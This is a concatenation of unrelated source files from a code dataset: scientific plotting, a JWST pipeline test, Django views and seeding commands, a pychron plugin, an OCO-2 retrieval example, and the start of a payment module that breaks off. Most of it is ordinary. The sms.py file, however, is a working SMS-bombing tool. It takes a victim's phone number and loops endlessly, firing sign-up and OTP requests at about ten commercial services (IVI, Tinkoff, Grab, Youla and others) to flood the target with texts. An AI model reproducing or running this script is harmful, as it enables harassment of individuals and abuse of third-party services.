fig.add_axes([p[0], 0.85, p[2]-p[0], 0.05])\n ax_cbar.set_title(titles[i], loc='left')\n cb = plt.colorbar(ims[i], cax=ax_cbar, orientation='horizontal')\n if i == 1:\n cb.set_ticks([0, 1])\n cb.set_ticklabels(\"Visible\", \"Shaded\")\n \n if self.run_state == True:\n canvas.draw() # Retrieve a view on the renderer buffer\n buf = canvas.buffer_rgba()\n X = np.asarray(buf) # convert to a NumPy array\n plt.close()\n return X\n else:\n plt.close()\n return fig\n \n def timeSeries_Plot(self, df, mx):\n '''\n plots a time series, given set of times and a tuple of y's.\n '''\n plt.close()\n #figure and three axes\n fig, ax_rad = self.fig, self.ax\n \n canvas = FigureCanvasAgg(fig)\n \n ax_m, ax_alpha, ax_viz = self.par1, self.par2, self.par3\n\n #setting up the plot title\n t_dict = self.param.time.names\n sunrise_sunset = f'({list(t_dict)[0]}-{list(t_dict)[-1]})'\n line1 = f'{self.date_string} {sunrise_sunset};'\n line2 = f' R, S, B={[self.resolution,self.sigma,self.bins]}'\n title = line1+line2\n ax_rad.set_title(title, loc='left', fontsize=12)\n\n #x-axis vals (in UTC) & labels (in PT)\n times = df['UTC_datetime'] - timedelta(hours=self.UTC_offset)\n time_labels = [t.strftime(\"%H:%M\") for t in times]\n time_labels[0] = ''\n ax_rad.set_xticks(times[::4])\n ax_rad.set_xticklabels(time_labels[::4])\n\n #assigning curve values\n cols = df.columns\n vals = [\n tuple(df[next(col for col in cols if col.startswith('downward looking'))]),\n tuple(df[next(col for col in cols if col.startswith('upward looking diffuse'))]),\n tuple(df[next(col for col in cols if col.startswith('upward looking solar'))] \n - df[next(col for col in cols if col.startswith('upward looking diffuse'))]),\n tuple(df['M_planar']),\n tuple(df['Albedo_planar']),\n tuple(df['raster_meanM']),\n tuple(df['raster_meanALPHA']),\n tuple(df['maskedmeanM']),\n tuple(df['maskedAlbedo']),\n tuple(df['viz_percent'])\n ]\n #variable assignment\n (globalup, diffusedwn, directdwn, M_planar, Albedo_planar, \n raster_meanM, raster_meanALPHA, maskedmeanM, maskedAlbedo, \n viz_percent) = vals \n\n #measurements\n m = {\n 'Global Up': [globalup, 'orange'],\n 'Direct Dwn': [directdwn, 'salmon'],\n 'Diffuse Dwn': [diffusedwn, 'peachpuff']\n }\n\n #products\n p = {'M':[M_planar,'solid'], 'Alpha':[Albedo_planar,'solid'], 'IDR':['planarIDR','green']}\n r = {'M':[raster_meanM,'dashed'],'Alpha':[raster_meanALPHA,'dashed'],'IDR':[\"rIDR_data\",'dgreen']}\n h = {'M':[maskedmeanM,'dotted'],'Alpha':[maskedAlbedo,'dotted'], 'IDR':[\"hIDR_data\",'ddgreen']}\n v = {'v':[viz_percent, 'k']}\n\n #unification\n plot = {\n **{m[pick][0]:[m[pick][1],'raw'] \n for pick in self.set_measurements},\n **{p[pick][0]:[p[pick][1], pick] \n for pick in self.set_planar_curves},\n **{r[pick][0]:[r[pick][1], pick] \n for pick in self.set_raster_curves},\n **{h[pick][0]:[h[pick][1], pick] \n for pick in self.set_horizon_curves},\n **{v['v'][0]:[v['v'][1], 'viz']}\n } \n\n #plot\n for data, metadata in zip(plot.keys(), plot.values()):\n ax_rad.plot(times, np.zeros((len(times))), alpha=0) #time4host\n if metadata[1] in ('raw', 'IDR'):\n ax_rad.plot(times[:mx], data[:mx], c=metadata[0])\n elif metadata[1] == 'M':\n ax_m.plot(times[:mx], data[:mx], ls=metadata[0], c='mediumorchid')\n elif metadata[1] == 'Alpha':\n ax_alpha.plot(times[:mx], data[:mx], ls=metadata[0], c='darkturquoise')\n elif metadata[1] == 'viz':\n if self.set_visibile_curve:\n ax_viz.plot(times[:mx], data[:mx], c=metadata[0], alpha=0.5)\n else:\n raise KeyError('Plot data|metadata error.')\n\n if self.run_state == True:\n canvas.draw() # Retrieve a view on the renderer buffer\n buf = canvas.buffer_rgba()\n X = np.asarray(buf) # convert to a NumPy array\n plt.close()\n return X\n else:\n plt.close()\n return fig\n ","sub_path":"__albedo__/plotmethods.py","file_name":"plotmethods.py","file_ext":"py","file_size_in_byte":14397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"104941557","text":"import requests\nimport os\nimport sys\nimport time\n\ni = 0\nphone = input('телефон (без +):')\n\nwhile True:\n a = time.strftime(\"%H:%M:%S\", time.localtime())\n\n def ivi():\n time.sleep(1)\n r = requests.post('https://api.ivi.ru/mobileapi/user/register/phone/v6/',data= {'phone':phone})\n print(a, \"IVI: смс отправлено на номер:\"+phone)\n ivi()\n def tinkoff ():\n time.sleep(1)\n r = requests.post('https://api.tinkoff.ru/v1/sign_up?origin=web%2Cib5%2Cplatform&sessionid=jZSpmBlh57ZaC2PGtgXSK3O93jR311Um.m1-prod-api12&wuid=01e96f12c2be466585c150558a7de6cd&dmpId=5102f430-cf37-4db2-a3c3-49f4663f665d', data={'phone':'+'+phone})\n print(a, \"Тинкооф: смс отправлено на номер:\"+phone)\n tinkoff()\n def delivery_clab():\n time.sleep(1)\n r = requests.post('https://www.delivery-club.ru/ajax/user_otp', data={\"phone\":phone})\n print(a, \"Delivery club: смс отправлено на номер:\"+phone)\n delivery_clab()\n def grab():\n time.sleep(1)\n r = requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber':phone, 'countryCode': 'ID', 'name': 'nuubi', 'email': 'nuubi@mail.com', 'deviceToken': '*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'})\n print(a, \"GrabTaxi: смс отправлено на номер:\"+phone)\n grab()\n def youla():\n time.sleep(1)\n r = requests.post('https://youla.ru/web-api/auth/request_code',data={'phone':phone} )\n print(a, \"Юла: смс отправлено на номер:\"+phone)\n youla()\n def korona ():\n time.sleep(1)\n r = requests.post('https://koronapay.com/transfers/online/api/users/otps',data={'phone': phone})\n print(a, \"Золотая Корона: смс отправлено на номер:\"+phone)\n korona()\n def stoloto ():\n time.sleep(1)\n r = requests.post('https://www.stoloto.ru:443/send-mobile-app-link',data={'phone':phone})\n print(a, \"Столото: смс отправлено на номер:\"+phone)\n stoloto()\n def drugvokrug():\n time.sleep(1)\n r = requests.post('https://drugvokrug.ru:443/siteActions/processSms.htm',data={'cell':phone})\n print(a, \"Другвокруг: смс отправлено на номер:\"+phone)\n drugvokrug()\n def belkacar():\n time.sleep(1)\n r = requests.post('https://belkacar.ru:443/get-confirmation-code',data={'phone':phone})\n print(a, \"BelkaCar: смс отправлено на номер:\"+phone)\n belkacar()\n def dodopizza():\n time.sleep(1)\n r = requests.post('https://dodopizza.ru/api/sendconfirmationcode',data={'phoneNumber':phone})\n print(a, \"DodoPizza: смс отправлено на номер:\"+phone)\n i += 1\ninput()","sub_path":"sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"52817346","text":"\n\"\"\"\npy.test module for unit testing the cube_build step.\n\"\"\"\n\nimport os\nimport time\nfrom glob import glob\n\nimport pytest\nfrom astropy.io import fits\nfrom jwst.cube_build.cube_build_step import CubeBuildStep\n\nfrom nirspec_pipe_testing_tool.utils import change_filter_opaque2science\nfrom . import cube_build_utils\nfrom nirspec_pipe_testing_tool import core_utils\n\n\n\n# HEADER\n__author__ = \"M. A. Pena-Guerrero\"\n__version__ = \"1.3\"\n\n# HISTORY\n# Nov 2017 - Version 1.0: initial version completed\n# Mar 2019 - Version 1.1: separated completion from other tests\n# Apr 2019 - Version 1.2: implemented nptt_log capability\n# Apr 2023 - Version 1.3: Cleaned-up code\n\n\n# Set up the fixtures needed for all of the tests, i.e. open up all of the FITS files\n\n# Default names of pipeline input and output files\n@pytest.fixture(scope=\"module\")\ndef set_inandout_filenames(request, config):\n step = \"cube_build\"\n step_info = core_utils.set_inandout_filenames(step, config)\n step_input_filename, step_output_filename, in_file_suffix, out_file_suffix, True_steps_suffix_map = step_info\n return step, step_input_filename, step_output_filename, in_file_suffix, out_file_suffix, True_steps_suffix_map\n\n\n# fixture to read the output file header\n@pytest.fixture(scope=\"module\")\ndef output_vars(set_inandout_filenames, config):\n # determine if the pipeline is to be run in full, per steps, or skipped\n run_calwebb_spec2 = config.get(\"run_calwebb_spec2_in_full\", \"run_calwebb_spec2\")\n if run_calwebb_spec2 == \"skip\":\n print('\\n * PTT finished processing run_calwebb_spec2 is set to skip. \\n')\n pytest.exit(\"Skipping pipeline run and tests for spec2, run_calwebb_spec2 is set to skip in PTT_config file.\")\n elif \"T\" in run_calwebb_spec2:\n run_calwebb_spec2 = True\n else:\n run_calwebb_spec2 = False\n\n # get the general info\n set_inandout_filenames_info = core_utils.read_info4output_vars(config, set_inandout_filenames)\n step, txt_name, step_input_file, step_output_file, outstep_file_suffix = set_inandout_filenames_info\n run_pipe_step = config.getboolean(\"run_spec2_steps\", step)\n # determine which tests are to be run\n cube_build_completion_tests = config.getboolean(\"run_pytest\", \"_\".join((step, \"completion\", \"tests\")))\n #cube_build_reffile_tests = config.getboolean(\"run_pytest\", \"_\".join((step, \"reffile\", \"tests\")))\n #cube_build_validation_tests = config.getboolean(\"run_pytest\", \"_\".join((step, \"validation\", \"tests\")))\n run_pytests = [cube_build_completion_tests]#, cube_build_reffile_tests, cube_build_validation_tests]\n\n # Only run step if data is IFU\n output_directory = config.get(\"calwebb_spec2_input_file\", \"output_directory\")\n initial_input_file = config.get(\"calwebb_spec2_input_file\", \"input_file\")\n initial_input_file = os.path.join(output_directory, initial_input_file)\n if os.path.isfile(initial_input_file):\n inhdr = fits.getheader(step_input_file)\n detector = inhdr[\"DETECTOR\"]\n filt = inhdr[\"FILTER\"]\n grat = inhdr[\"GRATING\"]\n gratfilt = grat + \"-\" + filt + \"_s3d\"\n else:\n pytest.skip(\"Skipping \"+step+\" because the initial input file given in PTT_config.cfg does not exist.\")\n\n # if run_calwebb_spec2 is True calwebb_spec2 will be called, else individual steps will be ran\n step_completed = False\n end_time = '0.0'\n\n # Get the logfile instance for NPTT created in the run.py script\n nptt_log = os.path.join(output_directory, 'NPTT_calspec2_' + detector + '.log')\n nptt_log = core_utils.mk_nptt_log(nptt_log, reset=False)\n\n if core_utils.check_IFU_true(inhdr):\n # check if the filter is to be changed\n change_filter_opaque = config.getboolean(\"calwebb_spec2_input_file\", \"change_filter_opaque\")\n if change_filter_opaque:\n is_filter_opaque, step_input_filename = change_filter_opaque2science.change_filter_opaque(step_input_file,\n step=step)\n if is_filter_opaque:\n filter_opaque_msg = \"With FILTER=OPAQUE, the calwebb_spec2 will run up to the extract_2d step. \" \\\n \"Cube build pytest now set to Skip.\"\n print(filter_opaque_msg)\n core_utils.add_completed_steps(txt_name, step, outstep_file_suffix, step_completed, end_time)\n pytest.skip(\"Skipping \"+step+\" because FILTER=OPAQUE.\")\n\n if run_calwebb_spec2:\n outhdr = fits.getheader(step_output_file)\n return outhdr, step_output_file, run_pytests, nptt_log\n else:\n if run_pipe_step:\n if os.path.isfile(step_input_file):\n if change_filter_opaque:\n nptt_log.info(filter_opaque_msg)\n\n # Create the pipeline step log\n stp_pipelog = \"calspec2_\" + step + \"_\" + detector + \".log\"\n core_utils.mk_stpipe_log_cfg(output_dir, stp_pipelog)\n print(\"Pipeline step screen output will be logged in file: \", stp_pipelog)\n\n msg = \" *** Step \"+step+\" set to True\"\n print(msg)\n nptt_log.info(msg)\n stp = CubeBuildStep()\n\n # check that previous pipeline steps were run up to this point\n core_utils.check_completed_steps(step, step_input_file)\n\n # get the right configuration files to run the step\n local_pipe_cfg_path = config.get(\"calwebb_spec2_input_file\", \"local_pipe_cfg_path\")\n # start the timer to compute the step running time\n start_time = time.time()\n if local_pipe_cfg_path == \"pipe_source_tree_code\":\n result = stp.call(step_input_file)\n else:\n result = stp.call(step_input_file, config_file=local_pipe_cfg_path+'/cube_build.cfg')\n result.save(step_output_file)\n # end the timer to compute the step running time\n end_time = repr(time.time() - start_time) # this is in seconds\n msg = \"Step \"+step+\" took \"+end_time+\" seconds to finish\"\n print(msg)\n nptt_log.info(msg)\n\n # determine the specific output of the cube step\n specific_output_file = glob(step_output_file.replace('cube.fits', (gratfilt + '*.fits').lower()))[0]\n cube_suffix = specific_output_file.split('cube_build_')[-1].replace('.fits', '')\n\n # record info\n step_completed = True\n outhdr = fits.getheader(step_output_file)\n\n # add the running time for this step\n core_utils.add_completed_steps(txt_name, step, \"_\" + cube_suffix, step_completed, end_time)\n return outhdr, step_output_file, run_pytests, nptt_log\n\n else:\n msg = \" The input file does not exist. Skipping step.\"\n print(msg)\n nptt_log.info(msg)\n core_utils.add_completed_steps(txt_name, step, outstep_file_suffix, step_completed, end_time)\n pytest.skip(\"Skipping \"+step+\" because the input file does not exist.\")\n\n else:\n msg = \"Skipping running pipeline step \"+step\n print(msg)\n nptt_log.info(msg)\n end_time = core_utils.get_stp_run_time_from_screenfile(step, detector, output_directory)\n\n # record info\n # specific cube step suffix\n cube_suffix = \"_s3d\"\n if os.path.isfile(step_output_file):\n outhdr = fits.getheader(step_output_file)\n step_completed = True\n # add the running time for this step\n core_utils.add_completed_steps(txt_name, step, cube_suffix, step_completed, end_time)\n return outhdr, step_output_file, run_pytests, nptt_log\n else:\n step_completed = False\n # add the running time for this step\n core_utils.add_completed_steps(txt_name, step, cube_suffix, step_completed, end_time)\n pytest.skip(\"Test skipped because input file \"+step_output_file+\" does not exist.\")\n\n else:\n pytest.skip(\"Skipping \"+step+\" because data is not IFU.\")\n\n\n# Unit tests\n\ndef test_s_ifucub_exists(output_vars):\n # get the logger instance\n nptt_log = output_vars[-1]\n # want to run this pytest?\n # output_vars[2] = cube_build_completion_tests, cube_build_reffile_tests, cube_build_validation_tests\n run_pytests = output_vars[2][0]\n if not run_pytests:\n msg = \"Skipping completion pytest: option to run Pytest is set to False in NPTT_config.cfg file.\"\n print(msg)\n nptt_log.info(msg)\n pytest.skip(msg)\n else:\n msg = \" * Running completion pytest...\"\n print(msg)\n nptt_log.info(msg)\n assert cube_build_utils.s_ifucub_exists(output_vars[0]), \"The keyword S_IFUCUB was not added to the header \" \\\n \"--> IFU cube_build step was not completed.\"\n\n","sub_path":"nirspec_pipe_testing_tool/calwebb_spec2_pytests/M_cube_build/test_cube_build.py","file_name":"test_cube_build.py","file_ext":"py","file_size_in_byte":9407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"549783611","text":"# Copyright 2016 the original author or authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n__author__ = \"Julian Debatin\"\n__copyright__ = \"The authors\"\n__license__ = \"Apache 2\"\n__email__ = \"juliandebatin@gmail.com\"\n__status__ = \"Production\"\n\nfrom ModuroModel.Spa.SpaPcdbCdiInUa import SpaPcdbCdiInUa\n\n\nclass SpaPcdbCdiInDa(SpaPcdbCdiInUa):\n def __init__(self, sim, simthread):\n SpaPcdbCdiInUa.__init__(self, sim, simthread)\n\n def _initModel(self):\n self.name = \"SpaCdbPcdiInDa\"\n self.adhFactor = 0.25\n self.cellTypes = self._createCellTypes()\n self.energyMatrix = self._createEnergyMatrix()\n self._run() # Must be the last statement.\n\n\n def _createEnergyMatrix(self):\n energyMatrix = [[0, 14, 14, 14, 14, 4],\n [0, -1, 1, 3, 12, 12],\n [0, 0, 6, 4, 8, 14],\n [0, 0, 0, 5, 8, 12],\n [0, 0, 0, 0, 6, 4],\n [0, 0, 0, 0, 0, 2]]\n\n return energyMatrix","sub_path":"Simulation/ModuroModel/Spa/SpaPcdbCdiInDa.py","file_name":"SpaPcdbCdiInDa.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"389115060","text":"#===============================================================================\n# Copyright 2011 Jake Ross\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#===============================================================================\n\n#============= enthought library imports =======================\nfrom traits.api import on_trait_change\n#============= standard library imports ========================\n\n#============= local library imports ==========================\nfrom src.envisage.core.core_ui_plugin import CoreUIPlugin\n\nclass ArArUIPlugin(CoreUIPlugin):\n '''\n '''\n id = 'pychron.arar'\n\n def _preferences_pages_default(self):\n from arar_preferences_page import ArArPreferencesPage\n return [ArArPreferencesPage]\n\n def _action_sets_default(self):\n from arar_action_set import ArArActionSet\n return [ArArActionSet]\n\n def _perspectives_default(self):\n from arar_perspective import ArArPerspective\n p = [ArArPerspective]\n return p\n\n def _get_manager(self):\n return self.application.get_service('src.arar.arar_manager.ArArManager')\n\n def _get_db(self):\n return self.application.get_service('src.database.adapters.massspec_database_adapter.MassSpecDatabaseAdapter')\n\n#============= views ===================================\n def _views_default(self):\n '''\n '''\n rv = [\n# self._create_data_directory_view,\n self._create_notes_view,\n self._create_info_view,\n self._create_engine_view,\n# self._create_engine_configure_view,\n self._create_database_view\n ]\n return rv\n\n def _create_database_view(self, **kw):\n man = self._get_db()\n man.connect()\n\n man.selector_factory()\n args = dict(\n id='pychron.arar.database',\n name='Database',\n obj=man.selector\n )\n return self.traitsuiview_factory(args, kw)\n\n def _create_engine_view(self, **kw):\n man = self._get_manager()\n args = dict(\n id='pychron.arar.engine',\n name='Engine',\n obj=man\n )\n return self.traitsuiview_factory(args, kw)\n\n def _create_engine_configure_view(self, **kw):\n man = self._get_manager()\n args = dict(\n id='pychron.arar.engine.configure',\n name='Configure Engine',\n obj=man.engine,\n view='configure_view'\n )\n return self.traitsuiview_factory(args, kw)\n\n\n def _create_notes_view(self, **kw):\n from notes_view import NotesView\n obj = NotesView()\n manager = self._get_manager()\n if manager is not None:\n manager.on_trait_change(obj.selected_update, 'selected')\n\n args = dict(id='pychron.arar.notes_view',\n name='Notes',\n obj=obj\n )\n return self.traitsuiview_factory(args, kw)\n\n def _create_info_view(self, **kw):\n from info_view import InfoView\n obj = InfoView()\n manager = self._get_manager()\n if manager is not None:\n manager.on_trait_change(obj.selected_update, 'selected')\n\n args = dict(id='pychron.arar.info',\n name='Info',\n obj=obj\n )\n return self.traitsuiview_factory(args, kw)\n\n# def _create_data_directory_view(self, **kw):\n# modeler_manager = self._get_manager()\n#\n# args = dict(\n# id='pychron.modeler.data_directory',\n# name='Data',\n# view='data_select_view',\n# obj=modeler_manager#.modeler,\n# )\n# return self.traitsuiview_factory(args, kw)\n\n @on_trait_change('application.gui:started')\n def _started(self, obj, name, old, new):\n '''\n\n '''\n if new is True:\n app = self.application\n manager = app.get_service('src.arar.arar_manager.ArArManager')\n# manager.open_default()\n manager.demo_open()\n#============= EOF ====================================\n","sub_path":"src/zobs/arar/plugins/arar_ui_plugin.py","file_name":"arar_ui_plugin.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"352890467","text":"from django.shortcuts import render\nimport pickle\nimport os\nimport pandas as pd\nfrom pathlib import Path\n\nBASE_DIR = Path(__file__).resolve().parent.parent\nPkl_Filename = os.path.join(BASE_DIR, \"app/tweet.pkl\")\n\nwith open(Pkl_Filename, 'rb') as file: \n Pickled_LR_Model = pickle.load(file)\n\n# Create your views here.\ndef index(request):\n\t\n\tif request.method==\"POST\":\n\n\t\ttextinp = request.POST[\"textinp\"]\n\t\tprint(textinp)\n\t\tflag = Pickled_LR_Model.predict(pd.Series(textinp)) \n\t\tprint(flag)\n\t\tif(flag[0] == 0):\n\t\t\tfd = True\n\t\telse:\n\t\t\tfd = False\n\t\tcontext = {\n\t\t\t\"flag\" : fd\n\t\t}\n\t\treturn render(request,'app/index.html', context)\t\n\n\n\telse:\n\t\treturn render(request,'app/index.html')\t","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"380958164","text":"from plotly.offline import download_plotlyjs, init_notebook_mode, iplot\nfrom plotly.graph_objs import *\nimport plotly\nplotly.offline.init_notebook_mode()\n\n\ntrace1 = Scatter(\n x = Actual1.ds,\n y = Actual1.yhat,\n name='Actual'\n \n)\n\ntrace2 = Scatter(\n x = Forecast1.ds,\n y = Forecast1.yhat,\n name='Predicted'\n)\n\ndata = [trace1,trace2]\n\nlayout = Layout(\n width=1100,\n height=500,\n title='Sales Forecast',\n titlefont=dict(\n family='Helvetica',\n size=16,\n color='#394242'\n ),\n xaxis=dict(\n title='Time'\n ),\n yaxis=dict(\n range=[0,700000],\n gridcolor='#a4a5a9',\n title='Sales'\n )\n) \n \nfig = dict(data=data, layout=layout)\niplot(fig)","sub_path":"Mode/demo/spaces/Sales/Clone of Forecasting in Python.57f42ffc25d5/notebook/cell-number-19.6fc7632b1d0d.py","file_name":"cell-number-19.6fc7632b1d0d.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"470982124","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport os\nimport json\nfrom otto.core.bitso_ import BitsoTrade\n# from otto.helpers import ottoHelpers # Need to update to Python3\n\n# Global Vars\n#_oh = ottoHelpers()\n#_oh.logger.info('Helpers are ON!')\n\ndef main():\n \"\"\" Main Method to execute Otto in console\n \"\"\"\n # Get Bitso Credentials\n _b_key = os.getenv('BITSO_API_KEY')\n _b_secr = os.getenv('BITSO_API_SECRET')\n # Bitso class initialization\n _bitso = BitsoTrade(_b_key, _b_secr)\n # Retrieve all currency-pair prices\n #_bitso.all_prices()\n # Set order\n #curr_pair = \"ltc_mxn\"\n #_bitso.set_market_order(curr_pair, 'buy', 0.002, only_check=True)\n # Get Balance\n #_bitso.get_balances()\n # Fetch Config File\n with open('config.json', 'r') as cfg:\n config = json.loads(cfg.read())\n # Set Automatic Trading on\n _bitso.automate(config)\n\nif __name__ == '__main__':\n print('\\nInitializing OttoCT v0.0.1.beta...', '\\n')\n main()\n print('Done!')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"144501344","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/9/30\n# @Author : hay\nimport os\n\n\nclass OperateFiles(object):\n\n def save_file(self, django_file_obj, save_path: str):\n # 保存文件\n try:\n if '.' not in save_path:\n save_path = os.path.join(save_path, django_file_obj.name)\n f = open(save_path, 'wb')\n for chunk in django_file_obj.chunks():\n f.write(chunk)\n f.close()\n try:\n suffix = django_file_obj.name.split('.')[-1]\n except:\n suffix = ''\n ret = {'file_name': django_file_obj.name, 'file_size': django_file_obj.size,\n 'file_save_path': save_path, 'file_suffix': suffix}\n except Exception as e:\n print(e)\n ret = {}\n return ret\n\n def deleta_file(self, file_name):\n # 移除文件\n if os.path.exists(file_name):\n os.remove(file_name)\n return True\n else:\n return False\n","sub_path":"core/operatefiles.py","file_name":"operatefiles.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"545501596","text":"import random\nfrom django.contrib.admin.utils import flatten\nfrom django.core.management.base import BaseCommand\nfrom django_seed import Seed\nfrom users.models import User\nfrom rooms.models import Room\nfrom lists.models import List\n\n\nclass Command(BaseCommand):\n\n help = \"Seed lists\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"--number\", type=int, default=1)\n\n def handle(self, *args, **options):\n number = options.get(\"number\")\n seeder = Seed.seeder()\n all_users = User.objects.all()\n all_rooms = Room.objects.all()\n seeder.add_entity(\n List, number, {\"user\": lambda x: random.choice(all_users),},\n )\n\n created = seeder.execute()\n cleaned = flatten(list(created.values()))\n for pk in cleaned:\n list_model = List.objects.get(pk=pk)\n to_add = all_rooms[random.randint(1, 5) : random.randint(6, 30)]\n list_model.rooms.add(*to_add)\n self.stdout.write(self.style.SUCCESS(f\"{number} list(s) created\"))\n","sub_path":"lists/management/commands/seed_list.py","file_name":"seed_list.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"177066052","text":"import pathlib\n\nfrom ...source.file import FileSourceConfig\nfrom ...source.json import JSONSource\nfrom ...source.source import Sources\nfrom ...base import field\n\n\nFIELD_SOURCES = field(\n \"Sources for loading and saving\",\n default_factory=lambda: Sources(\n JSONSource(\n FileSourceConfig(\n filename=pathlib.Path(\"~\", \".cache\", \"dffml.json\")\n )\n )\n ),\n labeled=True,\n required=True,\n)\n","sub_path":"dffml/util/config/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"300046825","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n url(r'^index/$', views.index, name='index'),\n # url(r'^say/$', views.say),\n url(r'^hand/(?P\\d{3})/(?P[A-z]{3})/$', views.hand),\n url(r'^post/$', views.post)\n]","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"63216080","text":"import os.path\n\nimport h5py\nimport numpy as np\n\nimport l2_afp\n\nddir = '/data/merrelli/l2_afp_sandbox'\nL1bfile = os.path.join(ddir, 'oco2_L1bScND_10246a_160604_B8000r_170630100507.h5')\nMetfile = os.path.join(ddir, 'oco2_L2MetND_10246a_160604_B8000r_170630042307.h5')\nIDPfile = os.path.join(ddir, 'oco2_L2IDPND_10246a_160604_B8100r_170721105543.h5')\n\n# clear sounding over california\nsounding_id = '2016060421174703'\n\n# cloudy sounding over pacific ocean near coast\n#sounding_id = '2016060421171802'\n\nmerradir = '/data/OCO2/L2_datasets/merra_composite'\nabscodir = '/data/OCO2/absco'\n\nwrkdir = '/home/merrelli/projects/l2_afp/examples/wrkdir'\nbase_sprop_file = 'l2_thinned_aerosol_combined.h5'\nsprop_grid_file = 'WC_sproperty_grid.h5'\nvardefs = [\n {'lua_name':'Water', 'grp_name':'wc_variable', \n 'grid_filename':sprop_grid_file, 'grid_grp_name':'WC_grid',\n 'svname':'Water cloud R_eff'} ]\n\nconfig_file = l2_afp.utils.get_lua_config_files()['watercloud_only']\n\nl2_obj = l2_afp.wrapped_fp_aerosol_reff(\n base_sprop_file, vardefs,\n L1bfile, Metfile, config_file, abscodir,\n merradir = merradir, sounding_id = sounding_id, imap_file = IDPfile, wrkdir=wrkdir)\n\nSa = l2_obj.get_Sa()\nSe_diag = l2_obj.get_Se_diag()\nKupdate = l2_obj.Kupdate\ny = l2_obj.get_y()\nx0 = l2_obj.get_x()\n\nSe = l2_afp.utils.diagcmatrix(Se_diag)\n\nx_i_list, Fx_i_list, S_i_list = l2_afp.bayesian_nonlinear_solver(\n Se, Sa, y, x0, Kupdate, start_gamma=10.0,\n max_iteration_ct = 5, debug_write=False, \n match_l2_fp_costfunc=True)\n\n# change these into ndarray that match the normal l2 single sounding output, \n# with iteration output turned on.\n# shapes are [1, N_iter, N_var] for state var, uncertainty;\n# and [1, N_iter, N_var, N_var] for posterior covar.\nx_i = np.array(x_i_list)[np.newaxis, ...]\nFx_i = np.array(Fx_i_list)[np.newaxis, ...]\nS_i = np.array(S_i_list)[np.newaxis, ...]\nx_unc_i = np.zeros_like(x_i)\nfor n in range(S_i.shape[0]):\n x_unc_i[0,n,:] = np.sqrt(np.diag(S_i_list[n]))\n\noutput_filename = 'l2_afp_reff_test_'+sounding_id+'.h5'\nl2_obj.write_h5_output_file(\n output_filename, final_state = x_i_list[-1], \n final_uncert = np.sqrt(np.diag(S_i_list[-1])), \n modeled_rad = Fx_i_list[-1])\n\n# now append in the Iteration data.\n# note that h5py will nicely create the needed groups for you, \n# so we can do this easily in one loop.\nh = h5py.File(output_filename, 'a')\nvnames = [\n '/Iteration/RetrievedStateVector/state_vector_result', \n '/Iteration/RetrievalResults/aposteriori_covariance_matrix',\n '/Iteration/RetrievedStateVector/state_vector_aposteriori_uncert',\n '/Iteration/SpectralParameters/modeled_radiance']\nvdata = [x_i, S_i, x_unc_i, Fx_i]\nfor vname, v in zip(vnames, vdata):\n h.create_dataset(vname, data = v)\nh.close()\n","sub_path":"examples/example_l2_afp_reff_run.py","file_name":"example_l2_afp_reff_run.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"523868931","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n#=============================================================================\n#\n# FileName: ggpay.py\n# Desc: \n#\n# Author: dantezhu\n# Email: dantezhu@qq.com\n# HomePage: http://www.vimer.cn\n#\n# Created: 2015-04-03 17:48:34\n# Version: 0.0.1\n# History:\n# 0.0.1 | dantezhu | 2015-04-03 17:48:34 | init\n#\n#=============================================================================\n\"\"\"\n\nimport logging\nimport requests\n\nlogger = 